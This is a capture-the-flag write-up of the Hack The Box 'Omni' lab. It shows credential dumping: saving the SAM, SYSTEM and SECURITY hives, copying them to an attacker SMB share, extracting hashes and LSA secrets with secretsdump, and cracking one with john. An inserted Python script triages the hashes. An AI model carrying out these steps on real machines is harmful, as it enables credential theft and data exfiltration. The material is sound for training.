Assessment
I was thinking about how to decrypt the encoded PSCredential objects I enumerated earlier. Those objects are encrypted beforehand with the corresponding user's password; the encoding itself only exists to store the encrypted PSCredential object in a string representation.
So in order to decrypt those PSCredential objects, I would need the corresponding user's password.
But then I realized that I AM the SYSTEM, with full administrative privileges. I do not need to look for vulnerabilities to exploit for lateral movement or privilege escalation, as I am already the SYSTEM.
I can simply dump the Windows authentication data (the SAM, SYSTEM and SECURITY registry hives) with the privileges I already have.
Windows Authentication Data
PS C:\Data\tmp> reg save HKLM\SAM sam
The operation completed successfully.
PS C:\Data\tmp> reg save HKLM\SYSTEM system
The operation completed successfully.
PS C:\Data\tmp> reg save HKLM\security security
The operation completed successfully.
Just like that. I CAN do that because I am the SYSTEM.
PS C:\Data\tmp> copy sam \\10.10.14.5\smb\
PS C:\Data\tmp> copy system \\10.10.14.5\smb\
PS C:\Data\tmp> copy security \\10.10.14.5\smb\
I will then transport them to Kali over SMB.
Hashdump
┌──(kali㉿kali)-[~/…/htb/labs/omni/3S]
└─$ impacket-secretsdump LOCAL -sam sam -system system -security security -outputfile hashdump
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] target system bootkey: 0x4a96b0f404fd37b862c07c2aa37853a5
[*] dumping local sam hashes (uid:rid:lmhash:nthash)
administrator:500:aad3b435b51404eeaad3b435b51404ee:a01f16a7fa376962dbeb29a764a06f00:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
defaultaccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
wdagutilityaccount:504:aad3b435b51404eeaad3b435b51404ee:330fe4fd406f9d0180d67adb0b0dfa65:::
sshd:1000:aad3b435b51404eeaad3b435b51404ee:91ad590862916cdfd922475caed3acea:::
devtoolsuser:1002:aad3b435b51404eeaad3b435b51404ee:1b9ce6c5783785717e9bbb75ba5f9958:::
app:1003:aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95:::
[*] dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DPAPI_SYSTEM
dpapi_machinekey:0xdc2beb4869328393b57ea9a28aeff84932c3e3ef
dpapi_userkey:0x6760a0b981e854b66007b33962764d5043f3d013
[*] NL$KM
0000 14 07 22 73 99 42 B0 ED F5 11 9A 60 FD A1 10 EF .."s.B.....`....
0010 DF 19 3C 6C 22 F2 92 0C 34 B1 6D 78 CC A7 0D 14 ..<l"...4.mx....
0020 02 7B 81 04 1E F6 1C 66 69 75 69 84 A7 31 53 26 .{.....fiui..1S&
0030 A3 6B A9 C9 BF 18 A8 EF 10 36 DB C2 CC 27 73 3D .k.......6...'s=
nl$km:140722739942b0edf5119a60fda110efdf193c6c22f2920c34b16d78cca70d14027b81041ef61c6669756984a7315326a36ba9c9bf18a8ef1036dbc2cc27733d
[*] Cleaning up...
With the three hives saved, I can dump the hashes offline using impacket-secretsdump in LOCAL mode.
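Before cracking, a quick triage of the dump above tells you which accounts need no cracking at all: the NT hash 31d6cfe0d16ae931b73c59d7e0c089c0 is MD4 of the empty string, so guest and defaultaccount have no password (which is why john later prints a bare `(Guest)`). The following Python is an added example, not part of the original writeup or of impacket; it parses secretsdump's `user:rid:lmhash:nthash:::` lines and flags empty passwords, real LM hashes and NT hashes shared across accounts.

```python
"""Triage a secretsdump SAM dump (user:rid:lmhash:nthash:::) before cracking.
Added example, not from the original writeup; SAMPLE repeats SAM lines shown above."""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # stored when LM hashing is disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # MD4(UTF-16LE("")): empty password

@dataclass
class SamEntry:
    user: str
    rid: int
    lmhash: str
    nthash: str

def parse_hashdump(text: str) -> List[SamEntry]:
    """Parse secretsdump output, skipping its "[*] ..." status lines."""
    entries = []
    for raw in text.splitlines():
        parts = raw.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue  # status line, blank line, or not a user:rid:lm:nt record
        entries.append(SamEntry(parts[0].lower(), int(parts[1]),
                                parts[2].lower(), parts[3].lower()))
    return entries

def triage(entries: List[SamEntry]) -> Dict[str, object]:
    """Flag empty passwords, real LM hashes, and NT hashes reused across accounts."""
    empty_password, lm_present = [], []
    by_nt: Dict[str, List[str]] = defaultdict(list)
    for e in entries:
        if e.nthash == EMPTY_NT:
            empty_password.append(e.user)
        if e.lmhash != EMPTY_LM:
            lm_present.append(e.user)  # LM hashes are trivially crackable
        by_nt[e.nthash].append(e.user)
    # Same non-empty NT hash on several accounts means the same password
    shared = {h: u for h, u in by_nt.items() if len(u) > 1 and h != EMPTY_NT}
    return {"empty_password": empty_password, "lm_hash_present": lm_present,
            "shared_nt_hash": shared}

SAMPLE = """[*] dumping local sam hashes (uid:rid:lmhash:nthash)
administrator:500:aad3b435b51404eeaad3b435b51404ee:a01f16a7fa376962dbeb29a764a06f00:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
defaultaccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
app:1003:aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95:::
"""
```

Running `triage(parse_hashdump(SAMPLE))` on the lines above reports guest and defaultaccount as empty-password accounts, no LM hashes and no reuse, so only the remaining NT hashes are worth feeding to john.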
Password Cracking
┌──(kali㉿kali)-[~/…/htb/labs/omni/3S]
└─$ john hashdump.sam --wordlist=/usr/share/wordlists/rockyou.txt --format=NT
Using default input encoding: UTF-8
Loaded 6 password hashes with no different salts (NT [MD4 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=3
Press 'q' or Ctrl-C to abort, almost any other key for status
(Guest)
mesh5143 (app)
2g 0:00:00:00 DONE (2023-02-03 19:05) 2.898g/s 20787Kp/s 20787Kc/s 91283KC/s markinho..*7¡Vamos!
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.
I cracked the NT hash for the app user with john this time. The cracked password is mesh5143.